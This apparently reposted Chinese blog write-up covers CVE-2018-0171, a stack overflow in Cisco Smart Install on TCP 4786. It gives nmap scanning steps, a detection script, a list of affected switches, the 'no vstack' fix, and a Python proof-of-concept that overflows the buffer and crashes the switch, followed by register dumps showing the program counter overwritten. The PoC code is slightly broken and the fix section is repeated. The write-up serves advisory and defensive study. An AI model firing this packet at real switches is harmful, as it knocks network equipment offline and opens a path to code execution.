Cisco Smart Install遠程命令執行漏洞

0x01前言
在Smart Install Client代碼中發現了基於堆棧的緩衝區溢出漏洞，該漏洞***者無需身份驗證登陸便可遠程執行任意代碼。cisco Smart Install是一種「即插即用」的配置和圖像管理功能，可爲新的交換機提供簡易的部署。該功能容許用戶將思科交換機放置到到任何位置，將其安裝到網絡中，而後啓動，無需其餘配置要求。所以它能夠徹底控制易受***的網絡設備。Smart Install是一種即插即用的配置和圖像管理的功能，爲新型交換機提供良好的圖形界面管理。它能使初始化配置過程自動化，並經過當前加載操做系統的鏡像提供新的交換機。該功能還可在配置發生變化的時候提供熱插熱拔的實時備份。須要注意的是，該功能在默認狀況下客戶端上是啓用了的。

0x02漏洞描述
思科 IOS 和 IOS-XE 系統 Smart Install Client 代碼中存在一處緩衝區棧溢出漏洞（CVE-2018-0171）。***者能夠遠程向 TCP 4786 端口發送一個惡意數據包，利用該漏洞，觸發目標設備的棧溢出漏洞形成設備拒絕服務（DoS）或在形成遠程命令執行，***者能夠遠程控制受到漏洞影響的網絡設備。據悉，思科交換器 TCP 4786 端口是默認開放的

0x03檢查漏洞
1.若是您的思科網絡設備開放了TCP 4786端口，則易受到***，爲了找到這樣的設備，只需經過nmap掃描目標網絡。

nmap -p T:4786 192.168.1.0/24

2.要檢查網絡設備是否開放了Smart Install Client客戶端功能，如下示例是在顯示配置爲Smart Install Clien的Cisco Catalyst交換機上的show vstack config命令輸出：

複製代碼
switch1# show vstack config
Role: Client (SmartInstall enabled)
.
switch2# show vstack config
Capability: Client
Oper Mode: Enabled
Role: Client
複製代碼
來自show vstack config命令輸出的Role：Client和Oper Mode：Enabled或Role：Client（已啓用SmartInstall）信息確認設備上已啓用了該功能。

3.思科機子上執行命令判斷，開放了4786端口即便用了SMI。

複製代碼
switch>show tcp brief all

TCBLocal Address Foreign Address (state)

0344B794.4786 .* LISTEN

0350A018.443 .* LISTEN

03293634.443 .* LISTEN

03292D9C.80 .* LISTEN

03292504.80 .* LISTEN
複製代碼
Cisco IOS和iex軟件版本檢查：

複製代碼
Router> show version

Cisco IOS Software, C2951 Software (C2951-UNIVERSALK9-M), Version 15.5(2)T1, RELEASE SOFTWARE (fc1)

Technical Support: http://www.cisco.com/techsupport

Copyright (c) 1986-2015 by Cisco Systems, Inc.

Compiled Mon 22-Jun-15 09:32 by prod_rel_team

ios-xe-device# show version

Cisco IOS Software, Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version Denali 16.2.1, RELEASE SOFTWARE (fc1)

Technical Support: http://www.cisco.com/techsupport

Copyright (c) 1986-2016 by Cisco Systems, Inc.

Compiled Sun 27-Mar-16 21:47 by mcpre
複製代碼

4.若是您不肯定您的漏洞是否受到影響，可使用Cisco的Cisco IOS Software Checker進行檢測：
https://tools.cisco.com/security/center/softwarechecker.x

5.使用下面的腳本探測對應IP端口是否確實開放的是思科SMI協議

https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py

協議特徵能夠參見msf扒拉出來的

https://github.com/rapid7/metasploit-framework/commit/c67e407c9c5cd28d555e1c2614776e05b628749d

複製代碼

python smi_check.py -i targetip

[INFO] Sending TCP probe to targetip:4786

[INFO] Smart Install Client feature active on targetip:4786

[INFO] targetip is affected
複製代碼

0x04 影響範圍

影響設備：
Catalyst 4500 Supervisor Engines
Cisco Catalyst 3850 Series Switches
Cisco Catalyst 2960 Series Switches

包含部分Smart Install Client的設備也可能受到影響：
Catalyst 4500 Supervisor Engines
Catalyst 3850 Series
Catalyst 3750 Series
Catalyst 3650 Series
Catalyst 3560 Series
Catalyst 2960 Series
Catalyst 2975 Series
IE 2000
IE 3000
IE 3010
IE 4000
IE 4010
IE 5000
SM-ES2 SKUs
SM-ES3 SKUs
NME-16ES-1G-P
SM-X-ES3 SKUs

0x05 漏洞驗證
如下是此漏洞驗證的PoC：

複製代碼

smi_ibc_init_discovery_BoF.py

import socket

import struct

from optparse import OptionParser

Parse the target options

parser = OptionParser()

parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1") parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786) (options, args) = parser.parse_args()

def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):

return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v

def send_packet(sock, packet):

sock.send(packet)

def receive(sock):

return sock.recv()

if name == "main":

print "[*] Connecting to Smart Install Client ", options.target, "port", options.port 

con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

con.connect((options.target, options.port)) 

payload = 'BBBB' * 44  shellcode = 'D' * 2048 

data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload 

tlv_1 = craft_tlv(0x00000001, data)  tlv_2 = shellcode 

pkt = hdr + tlv_1 + tlv_2 

print "[*] Send a malicious packet"  

send_packet(con, pkt)

複製代碼

要***交換機，則運行如下命令：

host$ ./smi_ibc_init_discovery_BoF.py-t 192.168.1.1

在交換機上應顯示崩潰信息並從新啓動：

複製代碼
00:10:35 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 1200, PC = 42424240

-Traceback= 42424240

Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_15

=== Flushing messages (00:10:39 UTC Mon Mar 1 1993) === Buffered messages:

...

Queued messages:

Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE

(fc3)

Technical Support: http://www.cisco.com/techsupport

Copyright (c) 1986-2016 by Cisco Systems, Inc.

Compiled Wed 17-Aug-16 13:46 by prod_rel_team

Instruction TLB Miss Exception (0x1200)!

SRR0 = 0x42424240 SRR1 = 0x00029230 SRR2 = 0x0152ACE4 SRR3 = 0x00029230

ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x84000000 DBSR = 0x00000000

CPU Register Context:

Vector = 0x00001200 PC = 0x42424240 MSR = 0x00029230 CR = 0x33000053

LR = 0x42424242 CTR = 0x014D5268 XER = 0xC000006A

R0 = 0x42424242 R1 = 0x02B1B0B0 R2 = 0x00000000 R3 = 0x032D12B4

R4 = 0x000000B6 R5 = 0x0000001E R6 = 0xAA3BEC00 R7 = 0x00000014

R8 = 0x0000001E R9 = 0x00000000 R10 = 0x001BA800 R11 = 0xFFFFFFFF

R12 = 0x00000000 R13 = 0x00110000 R14 = 0x0131E1A8 R15 = 0x02B1B1A8

R16 = 0x02B1B128 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x02B1B128

R20 = 0x02B1B128 R21 = 0x00000001 R22 = 0x02B1B128 R23 = 0x02B1B1A8

R24 = 0x00000001 R25 = 0x00000000 R26 = 0x42424242 R27 = 0x42424242

R28 = 0x42424242 R29 = 0x42424242 R30 = 0x42424242 R31 = 0x42424242

Stack trace:

PC = 0x42424240, SP = 0x02B1B0B0

Frame 00: SP = 0x42424242 PC = 0x42424242
複製代碼

0x06 漏洞修復
#conf t

Enter configuration commands, one per line. End with CNTL/Z.

NSJ-131-6-16-C2960_7(config)#no vstack

NSJ-131-6-16-C2960_7(config)#exit

關鍵的就是這句 no vstack

再看，端口已經關掉了。

#show tcp brief all

TCB Local Address Foreign Address (state)

075A0088 .443 .* LISTEN

0759F6C8 .443 .* LISTEN

0759ED08 .80 .* LISTEN

0759E348 .80 .* LISTEN

0x06 漏洞危害
可能會致使***者在受影響的設備上致使緩衝區溢出，這可能會產生以下影響：

觸發設備的從新加載

容許***者在設備上執行任意代碼

在受影響的設備上引起無限循環重啓，是設備崩潰

0x07 漏洞修復
#conf t

Enter configuration commands, one per line. End with CNTL/Z.

NSJ-131-6-16-C2960_7(config)#no vstack

NSJ-131-6-16-C2960_7(config)#exit

關鍵的就是這句 no vstack

再看，端口已經關掉了。

#show tcp brief all

TCB Local Address Foreign Address (state)

075A0088 .443 .* LISTEN

0759F6C8 .443 .* LISTEN

0759ED08 .80 .* LISTEN

0759E348 .80 .* LISTEN

0x08 參考文獻
https://embedi.com/blog/cisco-smart-install-remote-code-execution/

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2

https://www.anquanke.com/post/id/103122

https://mp.weixin.qq.com/s/cMYUuGFmox5PK89fO_eR8w

https://www.youtube.com/watch?v=CE7KNK6UJuk&feature=youtu.be&t=99

https://www.youtube.com/watch?v=TSg5EZVudNU&feature=youtu.be

原文：http://www.cnblogs.com/backlion/p/8675854.html